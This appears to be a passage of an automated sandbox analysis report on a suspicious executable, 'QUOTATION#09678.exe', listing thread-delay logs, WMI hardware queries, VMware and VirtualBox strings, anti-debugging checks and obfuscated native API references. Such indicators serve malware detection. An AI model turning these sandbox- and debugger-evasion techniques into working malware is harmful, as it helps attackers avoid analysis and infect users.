                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596621Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596266Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 300000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299749Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299094Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6762Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2850Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 2636Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 7161Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep count: 31 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7324Thread sleep count: 2636 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7324Thread sleep count: 7161 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -599641s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -599531s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -599421s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -599303s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -599141s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -598645s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -598500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -598391s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -598277s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -598156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -598047s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -597937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -597827s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -597719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -597594s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -597485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -597360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -597235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -597110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -596985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -596860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -596735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -596621s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -596500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -596391s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -596266s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -596156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -596047s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -595938s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -595813s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -595688s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -595563s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -595452s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -595344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -595219s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -595109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -595000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -594891s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -594781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -594672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -594563s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -594438s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -300000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -299859s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -299749s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -299640s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -299531s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -299422s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -299312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -299203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7320Thread sleep time: -299094s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599303Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598645Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598277Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597827Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596621Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596266Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 300000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299749Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 299094Jump to behavior
                  Source: Amcache.hve.8.drBinary or memory string: VMware
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                  Source: QUOTATION#09678.exe, 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: QUOTATION#09678.exe, 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                  Source: QUOTATION#09678.exe, 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                  Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: QUOTATION#09678.exe, 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: QUOTATION#09678.exe, 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: AddInProcess32.exe, 00000004.00000002.4174814523.00000000060D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: QUOTATION#09678.exe, 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                  Source: AddInProcess32.exe, 00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: QUOTATION#09678.exe, 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                  Source: QUOTATION#09678.exe, 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                  Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                  Source: AddInProcess32.exe, 00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: QUOTATION#09678.exe, 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                  Source: QUOTATION#09678.exe, 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                  Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02CA7E88 CheckRemoteDebuggerPresent,4_2_02CA7E88
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B88E395 rdtsc 0_2_00007FFD9B88E395
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: QUOTATION#09678.exe, --------------------.csReference to suspicious API methods: GetProcAddress(_05B6_05F8_0593_05BF_05B6_05BD_05B6_0599, _059A_05B1_05A2_05FD_05B4_0591_05BE_05EC_05F9_05F7_05A5)
                  Source: QUOTATION#09678.exe, --------------------.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer<_0595_05AF_0594_05C2_059D_05F9_05B9_05C2_05B9_05B7_05F9_05F8>(GetProcAddress(LoadLibrary(_05C7_05C4_05AE_05EB_05A4_05CA_05A8_05B1_05BB_05A3_05C6_05F3_05A6_05A8_05FE_05B0_05CD_05FD_05C9_05C9_05CD[2]), _05C7_05C4_05AE_05EB_05A4_05CA_05A8_05B1_05BB_05A3_05C6_05F3_05A6_05A8_05FE_05B0_05CD_05FD_05C9_05C9_05CD[3]))
